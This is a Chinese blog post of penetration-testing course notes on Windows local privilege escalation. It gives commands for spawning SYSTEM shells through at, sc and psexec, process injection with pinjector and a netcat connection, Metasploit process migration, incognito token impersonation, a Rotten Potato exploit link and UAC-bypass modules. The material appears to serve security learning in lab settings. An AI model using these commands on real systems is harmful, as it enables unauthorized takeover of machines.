第101天:权限提升-Win 本地用户&进程注入&令牌窃取&AT&SC&PS 服务命令

目录

思维导图

案例一: WIN-本地用户-AT&SC&PS 命令

AT命令

sc

PS

案例二:WIN-本地用户-进程迁移注入获取

msf

案例三:WIN-本地&Web-令牌窃取&土豆溢出

令牌窃取

土豆溢出

案例四: uac原理与绕过


思维导图

案例一: WIN-本地用户-AT&SC&PS 命令

AT命令

适用版本:Win2000 & Win2003 & XP 中还是存在的,在 Win7 以后被剔除

2003

at 21:00 /interactive cmd

18分的时候弹出窗口

sc

只适用于旧版本2003之前的

#创建一个名叫 syscmd 的新的交互式的 cmd 执行服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
#运行服务
sc start syscmd

PS

适用版本: Test in Win2012 and Win2008 & Win2016 其他未测 基本可以

执行命令

psexec.exe -accepteula -s -i -d cmd #调用运行 cmd

执行效果

win7

win2012

win2019

案例二:WIN-本地用户-进程迁移注入获取

win2003以下的版本可以利用工具pinjector

pinjector -p 420 cmd 3333  #在PID= 进程下添加一个继承父进程权限的线程
nc 192.168.46.149 3333

msf

利用工具注入的话,只能适用于2003版本,所以这里利用msf可以通杀

首先2008先反弹shell,admin

查看进程为system的

在该进程下添加

migrate pid号

测试的时候发现如果利用该进程好像会把系统打蓝屏,谨慎使用

win2019的测试结果

案例三:WIN-本地&Web-令牌窃取&土豆溢出

令牌窃取

执行的前提是身份一定是大于iis用户,否则无法执行

命令

use incognito    
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

win2019测试

个人主机win11,能否成功主要是看是否设置了uac

土豆溢出

项目下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

原理是正常上传webshell只能获得web权限,无法提权到system,配合烂土豆,执行,溢出可以获得system权限

这里我执行失败了,未知原因

execute -cH -f ./potato.exe   #执行烂土豆程序

use incognito   #加载窃取模块

list_tokens -u   #查看可窃取的令牌

impersonate_token "NT AUTHORITY\SYSTEM"   #窃取令牌

案例四: uac原理与绕过

利用msf  getsystem命令会自动帮你提权到system(在可以提权的条件下)

如何开启或关闭uac?

 

当时最低权限的时候

可以提权成功

 二级(每次切换得重启系统)

提权失败

搜索绕过uac的模块

使用该模块

2级与3级使用方法相似

4级

设置以后启动大部分程序都会弹出窗口需要确认

四级更加无法启动了

利用模块

exploit/windows/local/ask

会弹出窗口进行请求,如果对方点击就能提权,不点就不行

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值